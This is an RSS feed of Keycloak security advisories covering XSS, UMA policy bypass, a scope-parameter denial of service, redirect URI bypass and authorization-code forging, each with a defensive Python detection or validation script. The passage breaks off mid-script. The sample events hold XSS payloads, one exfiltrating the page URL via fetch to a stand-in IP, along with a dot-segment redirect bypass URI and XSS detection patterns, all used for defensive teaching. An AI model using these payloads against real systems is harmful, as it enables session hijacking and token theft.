<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Keycloak — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/keycloak/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata — refreshed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Wed, 15 Apr 2026 07:33:56 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/keycloak/feed.xml" rel="self" type="application/rss+xml"/><item><title>Keycloak Cross-Site Scripting Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-04-keycloak-xss/</link><pubDate>Wed, 15 Apr 2026 07:33:56 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-keycloak-xss/</guid><description>An authenticated remote attacker can exploit a vulnerability in Keycloak to perform a Cross-Site Scripting attack, potentially leading to unauthorized access and data compromise.</description><content:encoded><![CDATA[<p>A Cross-Site Scripting (XSS) vulnerability exists within Keycloak, a widely-used open-source identity and access management solution. This vulnerability allows a remote, authenticated attacker to inject malicious scripts into web pages viewed by other users. The attacker must possess valid credentials to initially access the vulnerable Keycloak instance. While the specific version affected is not provided in this advisory, it&rsquo;s crucial for organizations using Keycloak to investigate and apply necessary patches or mitigations. The impact of successful exploitation ranges from defacement to sensitive data theft and account compromise. 
Defenders should prioritize patching Keycloak installations and implementing input validation to mitigate this risk.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker authenticates to the Keycloak instance with valid credentials.</li>
<li>Attacker identifies a vulnerable input field or parameter within the Keycloak application (e.g., a user profile attribute or a group name) whose value is later rendered to other users.</li>
<li>Attacker crafts a malicious payload containing JavaScript code.</li>
<li>Attacker injects the malicious payload into the vulnerable input field.</li>
<li>The Keycloak application stores the payload as submitted and later renders it into a page without output encoding.</li>
<li>A victim user (e.g., another authenticated user or an administrator) accesses the page containing the injected payload.</li>
<li>The victim&rsquo;s browser executes the malicious JavaScript code.</li>
<li>The script then runs in the Keycloak origin with the victim&rsquo;s privileges: it can issue requests as the victim (for an administrator, admin REST API calls using the token the admin console holds), redirect the user to an attacker-controlled site, or overlay a fake login prompt.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation lets attacker-supplied script run in the Keycloak origin as the victim. Outright theft of the login session via <code>document.cookie</code> is the less likely outcome, because Keycloak&rsquo;s identity cookie (<code>KEYCLOAK_IDENTITY</code>) is HttpOnly; the realistic one is script driving the victim&rsquo;s session, which for an administrator means admin REST API calls made with the token the admin console keeps in memory: reading or changing users, credentials, client secrets and realm configuration. Beyond that, the attacker could deface the Keycloak interface, inject phishing prompts, or redirect users to malicious websites. The number of victims depends on how many users view the page that renders the injected payload; a payload stored in a field an administrator is likely to open (a user profile or group name) reaches the most privileged viewer.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Input validation and output encoding are fixes that land in Keycloak itself, so apply the vendor update. Where you extend Keycloak, custom login, account or admin themes are the usual place a deployer introduces XSS: make sure templates escape user-controlled values rather than emitting them raw.</li>
<li>Review Keycloak admin events (enable "Include representation" so the submitted object is recorded) and user events for profile, group and client updates whose values contain markup or script fragments.</li>
<li>Deploy the Sigma rule to detect possible XSS attempts in Keycloak logs.</li>
</ul>
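<p>As an added example (not code from the advisory or from the Keycloak project), the triage script below implements the review step above over Keycloak event records. It assumes the JSON shape Keycloak&rsquo;s admin events and user events have when exported (admin events carry the submitted object as a JSON string in <code>representation</code>, user events carry a <code>details</code> map); the sample events, actor IDs and payloads are constructed for illustration.</p>

```python
import json
import re

# Markup fragments typical of stored-XSS payloads. Meant for triage, not for blocking.
SUSPICIOUS = re.compile(
    r"<\s*(script|img|svg|iframe|object|embed|math|style)\b"  # tag injection
    r"|javascript\s*:"                                         # scheme-based handlers
    r"|\bon[a-z]+\s*=",                                        # inline event handlers
    re.IGNORECASE,
)

# Constructed sample events (not real Keycloak output). Field names follow Keycloak's
# JSON event records: admin events carry the submitted object as a JSON string in
# "representation"; user events carry a key/value "details" map. Values are made up.
SAMPLE_EVENTS = [
    {"type": "ADMIN", "operationType": "UPDATE", "resourceType": "USER",
     "resourcePath": "users/3f2a", "authDetails": {"userId": "3f2a", "ipAddress": "10.0.0.5"},
     "representation": json.dumps({"firstName": "Alice", "lastName": "Smith"})},
    {"type": "ADMIN", "operationType": "CREATE", "resourceType": "GROUP",
     "resourcePath": "groups/9c1e", "authDetails": {"userId": "77b0", "ipAddress": "203.0.113.9"},
     "representation": json.dumps(
         {"name": "ops<img src=x onerror=fetch('//203.0.113.9/?'+location.href)>"})},
    {"type": "UPDATE_PROFILE", "userId": "77b0", "ipAddress": "203.0.113.9",
     "details": {"updated_first_name": "<script>alert(document.domain)</script>",
                 "updated_last_name": "Doe"}},
    {"type": "LOGIN", "userId": "3f2a", "ipAddress": "10.0.0.5",
     "details": {"username": "alice", "redirect_uri": "https://app.example.com/cb"}},
]


def iter_strings(value, path=""):
    """Yield (json_path, text) for every string nested in value. Strings that
    themselves parse as a JSON object or array (Keycloak's "representation"
    field) are decoded and walked as well."""
    if isinstance(value, dict):
        for key, item in value.items():
            yield from iter_strings(item, f"{path}.{key}" if path else key)
    elif isinstance(value, list):
        for i, item in enumerate(value):
            yield from iter_strings(item, f"{path}[{i}]")
    elif isinstance(value, str):
        if value[:1] in ("{", "["):
            try:
                yield from iter_strings(json.loads(value), path)
                return
            except ValueError:
                pass  # not JSON after all; treat it as a plain string
        yield path, value


def scan_events(events):
    """Return one finding per string field whose value matches SUSPICIOUS."""
    findings = []
    for ev in events:
        auth = ev.get("authDetails", {})
        for path, text in iter_strings(ev):
            hit = SUSPICIOUS.search(text)
            if hit:
                findings.append({
                    "event": ev.get("type"),
                    "actor": auth.get("userId") or ev.get("userId"),
                    "ip": auth.get("ipAddress") or ev.get("ipAddress"),
                    "target": ev.get("resourcePath"),
                    "field": path,
                    "match": hit.group(0),
                })
    return findings


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

<p>Run against a real export, the same <code>scan_events</code> call over the admin REST <code>/events</code> and <code>/admin-events</code> output points you at the actor and source IP of each injected value, which is what the access-log review above is trying to recover.</p>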
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>keycloak</category><category>xss</category><category>cross-site scripting</category><category>cloud</category></item><item><title>Keycloak UMA Policy Bypass Vulnerability (CVE-2026-4636)</title><link>https://feed.craftedsignal.io/briefs/2026-04-keycloak-uma-bypass/</link><pubDate>Thu, 02 Apr 2026 13:16:27 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-keycloak-uma-bypass/</guid><description>CVE-2026-4636 describes a vulnerability in Keycloak where an authenticated user with the uma_protection role can bypass User-Managed Access (UMA) policy validation, leading to unauthorized access to victim-owned resources.</description><content:encoded><![CDATA[<p>A vulnerability, identified as CVE-2026-4636, has been discovered in Keycloak, a popular open-source identity and access management solution. This flaw allows an authenticated user who possesses the <code>uma_protection</code> role to bypass User-Managed Access (UMA) policy validation. By exploiting this vulnerability, an attacker can manipulate policy creation requests to include resource identifiers that belong to other users. This circumvents the intended access controls and enables the attacker to gain unauthorized permissions to resources owned by victims. The scope of the attack is limited to Keycloak instances where UMA is enabled and users have the <code>uma_protection</code> role. This can lead to significant data breaches and unauthorized actions performed under the guise of legitimate users.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker authenticates to Keycloak with an account that has the <code>uma_protection</code> role.</li>
<li>The attacker initiates a request to create a new UMA policy.</li>
<li>The attacker crafts the policy creation request to include resource identifiers that belong to other users. This is done even though the URL path in the request specifies a resource owned by the attacker.</li>
<li>The UMA policy validation mechanism fails to properly verify the ownership of the included resource identifiers.</li>
<li>Keycloak creates the UMA policy, granting the attacker unauthorized permissions to the victim-owned resources.</li>
<li>The attacker obtains a Requesting Party Token (RPT) for the victim&rsquo;s resources using the newly created policy.</li>
<li>The attacker uses the RPT to access the victim&rsquo;s resources, potentially accessing sensitive information.</li>
<li>The attacker performs unauthorized actions on the victim&rsquo;s resources, leveraging the gained permissions.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-4636 allows an attacker to gain unauthorized access to resources managed by Keycloak. This can lead to the exposure of sensitive data, such as personal information, financial records, or confidential business documents. The number of affected users depends on the scope of the attacker&rsquo;s access and the number of resources they can compromise. The impact could range from individual account compromise to widespread data breaches affecting entire organizations relying on Keycloak for access control.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the patch or upgrade to a version of Keycloak that resolves CVE-2026-4636 as soon as it becomes available.</li>
<li>Monitor Keycloak for UMA policy creation requests that reference resources the requester does not own. A Sigma rule on webserver logs can select POSTs to <code>/realms/&lt;realm&gt;/authz/protection/uma-policy/</code> (<code>/auth/realms/...</code> on legacy deployments that keep the <code>/auth</code> relative path), but access logs do not record request bodies, so the resource IDs in the body are only visible if a reverse proxy or WAF logs bodies for this path. Otherwise use the access log to identify the requester and time, then fetch the resulting policy through the Protection API and compare its resource IDs against the requester&rsquo;s own resources.</li>
<li>Until patched, limit exposure: grant the <code>uma_protection</code> role only to the resource-server clients that need the Protection API, and disable user-managed access on realms that do not use it.</li>
<li>Review existing UMA policies to identify and remove any policies that may have been created maliciously using this vulnerability.</li>
</ul>
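<p>The ownership check the advisory asks for, and the audit of existing policies, as an added example that is not Keycloak&rsquo;s code or part of the original brief. The resource and policy records are constructed; their field names (<code>owner</code>, <code>resources</code>, <code>users</code>) follow a simplified version of what the Protection API returns and are an assumption, not an exact export format. <code>validate_policy_request</code> models the check a patched server must make on <code>POST .../authz/protection/uma-policy/{resource_id}</code>: the requester must own the resource in the path, and the body must not widen the set of resources beyond it. <code>audit_policies</code> applies the same ownership test to policies already stored.</p>

```python
# Constructed sample data, not a Keycloak export. Shapes are simplified: resources
# carry their "owner", UMA policies carry "owner" plus the "resources" they grant.
RESOURCES = {
    "res-alice-1": {"name": "Alice's photos", "owner": "alice"},
    "res-alice-2": {"name": "Alice's notes", "owner": "alice"},
    "res-bob-1": {"name": "Bob's invoices", "owner": "bob"},
    "res-mal-1": {"name": "Mallory's drafts", "owner": "mallory"},
}

UMA_POLICIES = [
    {"id": "p1", "name": "share photos", "owner": "alice",
     "resources": ["res-alice-1"], "users": ["carol"], "scopes": ["view"]},
    # The CVE pattern: created through mallory's own resource, but granting others' resources.
    {"id": "p2", "name": "share notes", "owner": "mallory",
     "resources": ["res-mal-1", "res-alice-2", "res-bob-1"], "users": ["mallory"],
     "scopes": ["view"]},
]


def foreign_resources(owner, resource_ids, resources=RESOURCES):
    """Resource IDs in resource_ids that owner does not own (unknown IDs count as foreign)."""
    return sorted(r for r in resource_ids if resources.get(r, {}).get("owner") != owner)


def validate_policy_request(requester, path_resource_id, body, resources=RESOURCES):
    """Ownership check for POST .../authz/protection/uma-policy/{path_resource_id}.

    The requester must own the resource named in the path, and any "resources"
    listed in the body must not extend beyond that path resource.
    Returns (ok, reason).
    """
    if resources.get(path_resource_id, {}).get("owner") != requester:
        return False, f"path resource {path_resource_id} not owned by {requester}"
    body_ids = set(body.get("resources") or [path_resource_id])
    extra = body_ids - {path_resource_id}
    if extra:
        return False, f"body references resources outside the path: {sorted(extra)}"
    return True, "ok"


def audit_policies(policies=UMA_POLICIES, resources=RESOURCES):
    """Flag stored UMA policies whose resources are not all owned by the policy owner."""
    findings = []
    for policy in policies:
        foreign = foreign_resources(policy["owner"], policy.get("resources", []), resources)
        if foreign:
            findings.append({
                "policy": policy["id"],
                "owner": policy["owner"],
                "grantees": policy.get("users", []),
                "foreign_resources": foreign,
            })
    return findings


if __name__ == "__main__":
    print(validate_policy_request("mallory", "res-mal-1",
                                  {"resources": ["res-mal-1", "res-alice-2"]}))
    for finding in audit_policies():
        print(finding)
```

<p>For the clean-up step in the recommendations, each <code>audit_policies</code> finding names the policy to delete and the grantees who obtained access through it, so their sessions and any RPTs already issued can be revoked as well.</p>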
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>keycloak</category><category>uma</category><category>policy-bypass</category><category>privilege-escalation</category></item><item><title>Keycloak Denial-of-Service Vulnerability via Excessive Scope Parameter (CVE-2026-4634)</title><link>https://feed.craftedsignal.io/briefs/2026-04-keycloak-dos/</link><pubDate>Thu, 02 Apr 2026 13:16:27 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-keycloak-dos/</guid><description>An unauthenticated attacker can cause a denial-of-service on Keycloak servers by sending a crafted POST request to the OIDC token endpoint with an excessively long scope parameter, leading to high resource consumption.</description><content:encoded><![CDATA[<p>CVE-2026-4634 describes a denial-of-service vulnerability affecting Keycloak servers. This vulnerability allows an unauthenticated attacker to exhaust server resources by sending a specially crafted HTTP POST request to the OpenID Connect (OIDC) token endpoint. The malicious request includes an excessively long scope parameter, which forces the Keycloak server to consume significant processing time and memory. This can result in prolonged processing times for legitimate requests and ultimately a denial of service for all users of the affected Keycloak instance. The vulnerability was reported on April 2, 2026, and affects unpatched versions of Keycloak. Defenders should prioritize patching and consider implementing rate limiting to mitigate the impact of this vulnerability.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable Keycloak instance.</li>
<li>The attacker crafts an HTTP POST request targeted at the OIDC token endpoint (<code>/realms/{realm-name}/protocol/openid-connect/token</code>, or <code>/auth/realms/{realm-name}/protocol/openid-connect/token</code> on legacy deployments that keep the <code>/auth</code> relative path).</li>
<li>The attacker includes a <code>scope</code> parameter in the POST request.</li>
<li>The attacker sets the value of the <code>scope</code> parameter to an extremely long string, causing the Keycloak server to allocate excessive resources when processing it.</li>
<li>The attacker sends the malicious POST request to the Keycloak server.</li>
<li>The Keycloak server attempts to process the excessively long <code>scope</code> parameter, consuming CPU and memory resources.</li>
<li>Repeated requests from the attacker further exhaust server resources.</li>
<li>The Keycloak server becomes unresponsive, leading to a denial of service for legitimate users.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-4634 results in a denial-of-service condition, rendering the Keycloak server unavailable. This impacts all applications and services relying on Keycloak for authentication and authorization. The number of affected users depends on the size and criticality of the Keycloak deployment. Organizations in any sector using Keycloak are potentially vulnerable. Unavailability can disrupt business operations, impacting productivity and revenue.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the security patch released by Red Hat/Keycloak to address CVE-2026-4634 to eliminate the vulnerability.</li>
<li>Implement rate limiting on the OIDC token endpoint at the reverse proxy, keyed by client IP, and size it for legitimate token-refresh traffic so real clients are not throttled. Rate limits blunt repeated requests; they do not stop a single oversized request from being expensive.</li>
<li>Monitor for POST requests to the OIDC token endpoint with unusually long <code>scope</code> parameters. Access logs omit request bodies, so without body logging look at request body size and at spikes of slow or failed token requests; deploy the Sigma rule <code>Detect Suspiciously Long Scope Parameter</code> where the body is available to the log pipeline.</li>
<li>Consider a web application firewall (WAF) or reverse-proxy rule that rejects token requests whose <code>scope</code> value exceeds a sane length. <code>scope</code> travels in the form-encoded POST body, so the rule must inspect bodies; a plain request-size cap on this path is a cheaper first line of defense.</li>
</ul>
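<p>The rate limit and the scope-length cap above, combined into one pre-filter that a reverse proxy or WAF could apply in front of the token endpoint. This is an added example, not Keycloak&rsquo;s code or the vendor fix; the thresholds (<code>MAX_SCOPE_BYTES</code>, <code>MAX_SCOPE_ITEMS</code>, 50 requests per 10 seconds per IP) are illustrative assumptions to be tuned against real traffic. The clock is injectable so the limiter can be exercised deterministically.</p>

```python
import time
from collections import deque
from urllib.parse import parse_qs

TOKEN_PATH_SUFFIX = "/protocol/openid-connect/token"

# Illustrative limits, not values from the advisory or from Keycloak's fix.
MAX_BODY_BYTES = 64 * 1024      # refuse before parsing: parsing a huge body is work too
MAX_SCOPE_BYTES = 1024          # legitimate scope strings are a few dozen bytes
MAX_SCOPE_ITEMS = 32            # space-separated scope values
RATE_WINDOW_S = 10.0
RATE_MAX_REQUESTS = 50          # per client IP per window


class TokenEndpointGuard:
    """Pre-filter for POSTs to the OIDC token endpoint: size-bounds `scope` and
    rate-limits per client IP. Everything else passes through untouched."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock
        self._hits = {}  # ip -> deque of request timestamps inside the window

    def _rate_limited(self, ip):
        now = self._clock()
        window = self._hits.setdefault(ip, deque())
        while window and now - window[0] > RATE_WINDOW_S:
            window.popleft()
        if len(window) >= RATE_MAX_REQUESTS:
            return True
        window.append(now)
        return False

    def check(self, ip, method, path, body):
        """Return (allow, reason) for one request; body is the raw form-encoded text."""
        if method != "POST" or not path.endswith(TOKEN_PATH_SUFFIX):
            return True, "not a token request"
        if self._rate_limited(ip):
            return False, "rate limit exceeded"
        if len(body.encode()) > MAX_BODY_BYTES:
            return False, "body too large"
        form = parse_qs(body, keep_blank_values=True)
        for scope in form.get("scope", []):
            size = len(scope.encode())
            if size > MAX_SCOPE_BYTES:
                return False, f"scope too long ({size} bytes)"
            if len(scope.split()) > MAX_SCOPE_ITEMS:
                return False, "too many scope values"
        return True, "ok"


if __name__ == "__main__":
    guard = TokenEndpointGuard()
    print(guard.check("10.0.0.5", "POST", "/realms/demo/protocol/openid-connect/token",
                      "grant_type=client_credentials&scope=openid+profile"))
    print(guard.check("203.0.113.9", "POST", "/realms/demo/protocol/openid-connect/token",
                      "grant_type=client_credentials&scope=" + "a" * 5000))
```

<p>The order of the checks matters: the rate limiter runs before any body parsing so that a flood of oversized requests is rejected cheaply, and the body-size cap runs before <code>parse_qs</code> so the filter never does the very work it is meant to keep off Keycloak.</p>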
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cve-2026-4634</category><category>denial-of-service</category><category>keycloak</category></item><item><title>Keycloak Redirect URI Bypass Vulnerability (CVE-2026-3872)</title><link>https://feed.craftedsignal.io/briefs/2026-04-keycloak-redirect-bypass/</link><pubDate>Thu, 02 Apr 2026 13:16:26 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-keycloak-redirect-bypass/</guid><description>CVE-2026-3872 is a vulnerability in Keycloak that allows an attacker controlling a path on the same web server to bypass URI redirect validation using a wildcard, potentially leading to access token theft and information disclosure.</description><content:encoded><![CDATA[<p>CVE-2026-3872 is a security flaw found in Keycloak, a popular open-source identity and access management solution. This vulnerability allows a malicious actor who has control over another path on the same web server hosting Keycloak to circumvent the allowed path restrictions in redirect URIs that use a wildcard. By exploiting this weakness, an attacker can potentially redirect a user to a malicious site after authentication, intercept the access token, and gain unauthorized access to the user&rsquo;s resources. The vulnerability could lead to the disclosure of sensitive information and potentially compromise user accounts. This was published on April 2, 2026, and has a CVSS v3.1 score of 7.3.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains control of a path on the web server that the client&rsquo;s wildcard redirect URI points to (the advisory describes this as the same server that hosts Keycloak, which is the case when the relying party and Keycloak share a host). Control could come from a separate vulnerability in another application on that host, or from any feature that lets users publish content under a path of their own.</li>
<li>The attacker crafts a malicious URL that exploits the wildcard redirect URI validation flaw in Keycloak. The crafted URL includes a redirect URI that bypasses the intended restrictions.</li>
<li>A legitimate user initiates an authentication request to Keycloak, potentially through a vulnerable application relying on Keycloak for authentication.</li>
<li>Keycloak processes the authentication request and, due to the vulnerability, accepts the attacker&rsquo;s crafted redirect URI as valid.</li>
<li>Keycloak redirects the user to the attacker-controlled URL after successful authentication.</li>
<li>The attacker&rsquo;s server receives the authorization response. With the implicit or hybrid flow the access token is in the URL fragment and is captured directly; with the authorization code flow the attacker receives the code instead and can redeem it at the token endpoint when the client is public and does not require PKCE.</li>
<li>The attacker uses the stolen access token to impersonate the user and access protected resources.</li>
<li>The attacker gains unauthorized access to sensitive information or performs actions on behalf of the user, leading to information disclosure or other malicious activities.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-3872 can lead to the theft of access tokens, enabling unauthorized access to user accounts and sensitive data. This could result in the compromise of user privacy, financial loss, or reputational damage for organizations relying on affected Keycloak instances. The impact is significant because Keycloak is used across various sectors to secure web applications and APIs.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the security patches or updates provided by Red Hat for Keycloak to address CVE-2026-3872. Refer to the Red Hat advisory linked in the references for specific instructions.</li>
<li>Deploy the provided Sigma rule to detect exploitation attempts of CVE-2026-3872 based on suspicious redirect URIs in web server logs.</li>
<li>Review and harden redirect URI configuration in Keycloak: register exact redirect URIs and drop wildcards where possible, keep the implicit flow disabled, and require PKCE for public clients so that a leaked authorization code cannot be redeemed without the verifier.</li>
<li>Monitor web server logs for suspicious activity related to redirect URIs, looking for unusual patterns or attempts to access unauthorized resources.</li>
</ul>
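<p>To make the wildcard risk concrete, the added example below contrasts a naive string-glob redirect URI matcher with a strict one that compares scheme and host exactly, allows <code>*</code> only as the final path segment, and rejects dot segments, encoded separators and fragments. The dot-segment escape it demonstrates (a path that matches the registered prefix as text but resolves elsewhere once the browser normalizes it) is one well-known class of wildcard bypass chosen for illustration; the advisory does not state the exact mechanism of CVE-2026-3872, and this code is not Keycloak&rsquo;s. The registered URIs and the access-log lines are constructed, and <code>suspicious_redirects</code> shows how the strict matcher can be run over authorization-request log lines as the advisory recommends (in practice the registered pattern list would be looked up per <code>client_id</code>).</p>

```python
import re
from fnmatch import fnmatchcase
from urllib.parse import parse_qs, urlsplit

# Constructed client configuration (not from the advisory): one exact redirect URI
# and one wildcard of the kind Keycloak permits under "Valid redirect URIs".
REGISTERED = [
    "https://app.example.com/callback",
    "https://app.example.com/callback/*",
]


def naive_match(redirect_uri, patterns=REGISTERED):
    """Plain glob against the raw string: the weak check this example argues against.
    `*` in fnmatch matches any characters, slashes included, so a path that escapes
    /callback/ once the browser resolves its dot segments still passes."""
    return any(fnmatchcase(redirect_uri, p) for p in patterns)


def strict_match(redirect_uri, patterns=REGISTERED):
    """Exact scheme/host/port, path compared as a path, `*` only as the last
    segment, no fragments, no dot segments, no encoded separators."""
    u = urlsplit(redirect_uri)
    if not u.scheme or not u.netloc or u.fragment:
        return False
    lowered = u.path.lower()
    if any(tok in lowered for tok in ("%2e", "%2f", "%5c", "\\")) or "//" in u.path:
        return False
    if any(seg in (".", "..") for seg in u.path.split("/")):
        return False
    for p in patterns:
        pu = urlsplit(p)
        if (u.scheme.lower(), u.netloc.lower()) != (pu.scheme.lower(), pu.netloc.lower()):
            continue
        if pu.path.endswith("/*"):
            prefix = pu.path[:-1]  # "/callback/" keeps its trailing slash
            if u.path.startswith(prefix) and "*" not in u.path:
                return True
        elif u.path == pu.path:
            return True
    return False


# Authorization requests in a combined-format access log (path and query captured).
AUTH_REQUEST = re.compile(
    r'"GET (/(?:auth/)?realms/[^/ ]+/protocol/openid-connect/auth\?[^ "]*) HTTP/')

# Constructed log lines; addresses are documentation ranges.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [02/Apr/2026:13:16:26 +0000] "GET /realms/demo/protocol/openid-connect/auth'
    '?client_id=app&response_type=code&redirect_uri=https%3A%2F%2Fapp.example.com%2Fcallback'
    ' HTTP/1.1" 302 0',
    '203.0.113.9 - - [02/Apr/2026:13:17:01 +0000] "GET /realms/demo/protocol/openid-connect/auth'
    '?client_id=app&response_type=code&redirect_uri=https%3A%2F%2Fapp.example.com%2Fcallback'
    '%2F..%2Fuploads%2Fevil HTTP/1.1" 302 0',
    '10.0.0.8 - - [02/Apr/2026:13:18:12 +0000] "POST /realms/demo/protocol/openid-connect/token'
    ' HTTP/1.1" 200 1432',
]


def suspicious_redirects(log_lines, patterns=REGISTERED):
    """redirect_uri values from authorization requests that fail strict_match."""
    flagged = []
    for line in log_lines:
        m = AUTH_REQUEST.search(line)
        if not m:
            continue
        query = m.group(1).partition("?")[2]
        for uri in parse_qs(query).get("redirect_uri", []):
            if not strict_match(uri, patterns):
                flagged.append(uri)
    return flagged


if __name__ == "__main__":
    evil = "https://app.example.com/callback/../uploads/evil"
    print("naive:", naive_match(evil), "strict:", strict_match(evil))
    print(suspicious_redirects(SAMPLE_ACCESS_LOG))
```

<p>Note that <code>parse_qs</code> percent-decodes once, so a double-encoded <code>%252e</code> arrives at <code>strict_match</code> as <code>%2e</code> and is rejected by the encoded-separator check rather than slipping through as a literal dot.</p>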
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>keycloak</category><category>redirect-uri-bypass</category><category>cve-2026-3872</category><category>authentication</category><category>authorization</category></item><item><title>Keycloak Authorization Code Forging Vulnerability (CVE-2026-4282)</title><link>https://feed.craftedsignal.io/briefs/2026-04-keycloak-privesc/</link><pubDate>Thu, 02 Apr 2026 13:16:26 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-keycloak-privesc/</guid><description>An unauthenticated attacker can exploit CVE-2026-4282 in Keycloak's SingleUseObjectProvider to forge authorization codes, leading to privilege escalation and the creation of admin-capable access tokens.</description><content:encoded><![CDATA[<p>CVE-2026-4282 identifies a critical vulnerability within the Keycloak authentication server, specifically affecting the SingleUseObjectProvider. This component, responsible for managing single-use key-value pairs, suffers from a lack of sufficient type and namespace isolation. The absence of proper isolation mechanisms allows a remote, unauthenticated attacker to manipulate the system by forging authorization codes. Successful exploitation allows for the creation of access tokens with administrative privileges. The vulnerability was published on April 2, 2026.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker sends a crafted request to the Keycloak server to initiate the authorization flow.</li>
<li>The attacker leverages the lack of type and namespace isolation in the SingleUseObjectProvider.</li>
<li>The attacker forges a valid authorization code using the vulnerability.</li>
<li>The attacker presents the forged authorization code to the token endpoint.</li>
<li>Keycloak validates the forged code due to the flawed SingleUseObjectProvider logic.</li>
<li>The attacker receives an access token with elevated (admin) privileges.</li>
<li>The attacker uses the admin-capable access token to perform administrative actions.</li>
<li>The attacker gains full control over Keycloak resources and user data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-4282 allows a remote attacker to gain full administrative control over a Keycloak instance. This can lead to the compromise of all applications and services relying on Keycloak for authentication and authorization. The impact includes data breaches, account takeovers, and the potential for widespread service disruption. Given Keycloak&rsquo;s prevalence in securing web applications and APIs, the vulnerability poses a significant risk to organizations using affected versions.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the patch or upgrade to a version of Keycloak that resolves CVE-2026-4282 as soon as it becomes available from Red Hat.</li>
<li>Monitor Keycloak logs (Sigma logsource: category <code>webserver</code>, product <code>linux</code>) for suspicious requests to the authorization and token endpoints indicative of authorization code forging, and correlate <code>CODE_TO_TOKEN</code> events with the <code>LOGIN</code> events that issued their codes.</li>
<li>Input validation on the <code>code</code> parameter at a proxy does not address the root cause, which is the missing type and namespace isolation inside the single-use object store; treat the vendor patch as the fix. Until it is applied, reduce the blast radius by restricting network access to the admin console and admin REST API, and review admin events for actions performed by sessions you cannot account for.</li>
</ul>
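<p>One way to act on the monitoring recommendation, as an added example that is not the advisory&rsquo;s Sigma rule or Keycloak code: correlate <code>CODE_TO_TOKEN</code> events with the <code>LOGIN</code> events that issued their codes. In Keycloak&rsquo;s event log both event types carry the code identifier in <code>details.code_id</code>; that shape, taken from the admin REST <code>/events</code> output, is assumed here, and the sample events are constructed. An exchange whose <code>code_id</code> no LOGIN ever issued, an exchange outside the code lifespan, a code redeemed twice, or a redemption by a different client, user or session than the one that logged in are all conditions a forged or replayed code would produce.</p>

```python
CODE_LIFESPAN_MS = 60_000  # Keycloak's default authorization code lifespan is one minute

# Constructed Keycloak login events in the shape of GET /admin/realms/{realm}/events
# (simplified; code_id, session and user values are made up).
SAMPLE_EVENTS = [
    {"time": 1775000000000, "type": "LOGIN", "clientId": "app", "userId": "u-alice",
     "sessionId": "s1", "ipAddress": "10.0.0.5",
     "details": {"code_id": "c-1", "username": "alice"}},
    {"time": 1775000002000, "type": "CODE_TO_TOKEN", "clientId": "app", "userId": "u-alice",
     "sessionId": "s1", "ipAddress": "10.0.0.5",
     "details": {"code_id": "c-1", "grant_type": "authorization_code"}},
    # Same code exchanged a second time, from a different address.
    {"time": 1775000005000, "type": "CODE_TO_TOKEN", "clientId": "app", "userId": "u-alice",
     "sessionId": "s1", "ipAddress": "203.0.113.9",
     "details": {"code_id": "c-1", "grant_type": "authorization_code"}},
    # Exchange of a code that no LOGIN ever issued, against the admin console client.
    {"time": 1775000030000, "type": "CODE_TO_TOKEN", "clientId": "security-admin-console",
     "userId": "u-admin", "sessionId": "s9", "ipAddress": "203.0.113.9",
     "details": {"code_id": "c-forged", "grant_type": "authorization_code"}},
    # LOGIN for one client, code redeemed by another.
    {"time": 1775000040000, "type": "LOGIN", "clientId": "app", "userId": "u-bob",
     "sessionId": "s2", "ipAddress": "10.0.0.6",
     "details": {"code_id": "c-2", "username": "bob"}},
    {"time": 1775000041000, "type": "CODE_TO_TOKEN", "clientId": "admin-cli", "userId": "u-bob",
     "sessionId": "s2", "ipAddress": "10.0.0.6",
     "details": {"code_id": "c-2", "grant_type": "authorization_code"}},
]


def correlate_code_exchanges(events, lifespan_ms=CODE_LIFESPAN_MS):
    """Return one finding per CODE_TO_TOKEN event that cannot be tied cleanly to
    the LOGIN that issued its code."""
    ordered = sorted(events, key=lambda e: e["time"])
    logins = {}
    for ev in ordered:
        code = ev.get("details", {}).get("code_id")
        if ev["type"] == "LOGIN" and code:
            logins[code] = ev

    seen = set()
    findings = []
    for ev in ordered:
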